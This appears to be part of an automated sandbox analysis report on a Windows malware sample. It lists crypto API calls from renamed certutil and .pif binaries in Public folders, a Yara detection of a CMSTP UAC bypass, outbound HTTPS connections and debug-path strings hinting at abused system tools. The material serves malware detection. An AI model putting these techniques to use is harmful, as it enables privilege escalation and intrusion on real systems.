Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E13F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	6_2_00007FF6658E13F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659053E8 CryptEncodeObjectEx,GetLastError,#357,	6_2_00007FF6659053E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,	6_2_00007FF66595141C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66592342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF66592342C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658DB350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,	6_2_00007FF6658DB350
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B7340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,	6_2_00007FF6658B7340
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E5338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF6658E5338
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AB36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,	6_2_00007FF6658AB36C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,	6_2_00007FF66595739C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659593A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF6659593A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659333B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,	6_2_00007FF6659333B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659033A0 CryptVerifyCertificateSignature,CertCompareCertificateName,	6_2_00007FF6659033A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665923390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,	6_2_00007FF665923390
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665957EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,	6_2_00007FF665957EE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D7F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,	6_2_00007FF6658D7F14
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665985F20 CryptDecodeObjectEx,	6_2_00007FF665985F20
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665915F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,	6_2_00007FF665915F04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,	6_2_00007FF66594DE70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665985E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,	6_2_00007FF665985E3C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,	6_2_00007FF66590DEB0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658DDEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,	6_2_00007FF6658DDEA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665891DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,	6_2_00007FF665891DE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665911E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,	6_2_00007FF665911E2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B5DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,	6_2_00007FF6658B5DF7
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665985D74 CryptDecodeObjectEx,strcmp,strcmp,	6_2_00007FF665985D74
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665957D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,	6_2_00007FF665957D3C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,	6_2_00007FF66595BD3C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E1D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658E1D70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D9D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658D9D6C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665903D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,	6_2_00007FF665903D60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658DDD80 CertFindExtension,CryptDecodeObject,	6_2_00007FF6658DDD80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665935D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,	6_2_00007FF665935D80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B5DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,	6_2_00007FF6658B5DA1
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B60DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,	6_2_00007FF6658B60DA
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F4070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,	6_2_00007FF6658F4070
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,	6_2_00007FF66594E044
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665985FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,	6_2_00007FF665985FF0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B5FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,	6_2_00007FF6658B5FE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F5F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,	6_2_00007FF6658F5F54
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BFF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,	6_2_00007FF6658BFF64
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665925FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,	6_2_00007FF665925FA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665929F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,	6_2_00007FF665929F90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E3B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,	6_2_00007FF6658E3B14
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665919AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,	6_2_00007FF665919AF8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665939A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,	6_2_00007FF665939A58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B3A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658B3A40
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665927A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF665927A70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665921A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,	6_2_00007FF665921A44
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66593BA50 CryptSignCertificate,SetLastError,	6_2_00007FF66593BA50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665985AA8 CryptDecodeObjectEx,	6_2_00007FF665985AA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,	6_2_00007FF66594FA84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,	6_2_00007FF6658AF9B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,	6_2_00007FF66590B9CC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,	6_2_00007FF66595BA14
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658DF944 CryptDecodeObject,GetLastError,#357,	6_2_00007FF6658DF944
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665949970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,	6_2_00007FF665949970
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590B950 I_CryptGetLruEntryData,#357,	6_2_00007FF66590B950
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B7988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,	6_2_00007FF6658B7988
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,	6_2_00007FF66590597C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66597B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,	6_2_00007FF66597B980
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665915CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,	6_2_00007FF665915CE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66593DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,	6_2_00007FF66593DD1C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594FD2C CryptDecryptMessage,GetLastError,#357,	6_2_00007FF66594FD2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C1C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,	6_2_00007FF6658C1C50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D3C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF6658D3C60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665985C54 CryptDecodeObjectEx,CryptDecodeObjectEx,	6_2_00007FF665985C54
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665911C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,	6_2_00007FF665911C84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A9BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,	6_2_00007FF6658A9BC8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665923BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF665923BEB
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66592BBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,	6_2_00007FF66592BBC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658DFC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658DFC34
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,	6_2_00007FF6658BFC20
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665957B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,	6_2_00007FF665957B60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658EBB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658EBB38
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665955B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,	6_2_00007FF665955B44
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66592FB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,	6_2_00007FF66592FB50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,	6_2_00007FF66595BB50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658ABB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,	6_2_00007FF6658ABB80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665885BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF665885BA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,	6_2_00007FF66594FB94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665985B90 CryptDecodeObjectEx,memmove,	6_2_00007FF665985B90
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152C3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	9_2_152C3837
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14583837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	24_2_14583837

Source: sppsvc.pif, 00000009.00000002.4117523372.00000000152FB000.00000040.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_d7eb0ca4-2

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 24.2.Mywiztwu.PIF.14550000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Mywiztwu.PIF.14550000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Mywiztwu.PIF PID: 6548, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\Public\Libraries\Mywiztwu.PIF

Code function: 24_2_145574FD _wcslen,CoGetObject,

24_2_145574FD

Source: unknown	HTTPS traffic detected: 74.112.186.144:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.112.186.144:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.112.186.128:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.101.102:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.101.132:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49739 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: sppsvc.pif, 00000009.00000002.4113851046.0000000013AF5000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.9.dr
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1644562863.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1647785940.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1660935260.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1654132001.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1662066219.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1663916561.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1664317831.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1665714622.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1648239065.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1652106938.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1660326356.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1654699931.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
Source:	Binary string: easinvoker.pdbH source: sppsvc.pif, 00000009.00000002.4113851046.0000000013AF5000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.2526694806.000000001483E000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.9.dr
